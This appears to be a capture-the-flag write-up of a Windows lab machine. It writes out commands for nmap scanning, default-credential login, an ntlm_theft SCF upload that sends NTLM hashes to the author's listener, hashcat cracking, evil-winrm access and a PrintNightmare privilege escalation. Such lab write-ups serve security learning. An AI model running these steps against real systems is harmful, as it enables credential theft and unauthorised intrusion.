Enumeration
First thing to do is enumerating the machine. I use nmap to enumerate all open ports.
nmap -sV -sC -O -p- -T4 10.10.11.106
There are 4 open ports with service. Port 80 for HTTP, port 135 for MS RPC, port 445 for SMB, and port 5985 for WinRM. So, I go to port 80 and find that the website needs authorization. I use default credentials such as admin:admin1, admin:admin, administrator:password, etc. And luckily find the authorization among these default credentials.
This is the main webpage. Let’s search for interesting feature.
From here, I find that we can upload something to the server.
Let’s give a shot. I try to upload test file.
And it successfully uploaded.
Gaining Access
From here, I know that we can upload a file and the server will store it using samba protocol on port 445. Searching on google and there are several websites recommends me using some of techniques. First, I will try with eternalblue using metasploit.
Setting some options to target.
And run it.
It seems SMB not vulnerable to eternalblue exploit using metasploit. Then, I try to psexec exploit using metasploit.
Again, it is not vulnerable to psexec exploit. I don’t really know what’s wrong. After awhile, I find this website that suggests me to capture the NTLM (New Technology LAN Manager) Hash. So, I use this tool to make a “scf” file and set up a responder to catch hashes that being thrown back to us.
python3 ntlm_theft.py -f config -g scf -s 10.10.16.27(my ip)
Setting up the responder that listens to tun0 as interface.
responder -I tun0
Uploading the scf file.
Then, after finished the upload, I clicked browse and it returns hashes.
Dehashing it using hashcat so I can get the credentials.
hashcat -m 5600 hash.txt rockyou.txt — force -O
And find that liltony as the password and TONY as username. Then I use evil-winrm to login.
evil-winrm -i 10.10.11.106(target) -u TONY(username) -p liltony(password) -P 5985(port)
And I successfully gain the access. Enumerating the system and I find user.txt inside the Desktop folder.
Privilege Elevation
Then I try to enumerate for exploits using winPEAS. First, I upload the bat version of winPEAS. Using “upload” keyword to upload things through evil-winrm.
upload /directory/winPEASbat
Run it.
And I found nothing from winPEASbat, then I try winPEASexe.
Found some username with administrator privilege.
And found some of this open ports running locally.
After searching in internet, I find this exploits, CVE-2021–34527 and CVE-2021–1675. Download the CVE-2021–1675 script and upload it.
Then, I import modules from this CVE file and invoke the module.
After that, I try to login using username adm1n and password P@ssw0rd.
And successfully got the administrator privilege. Enumerating a while and find root.txt.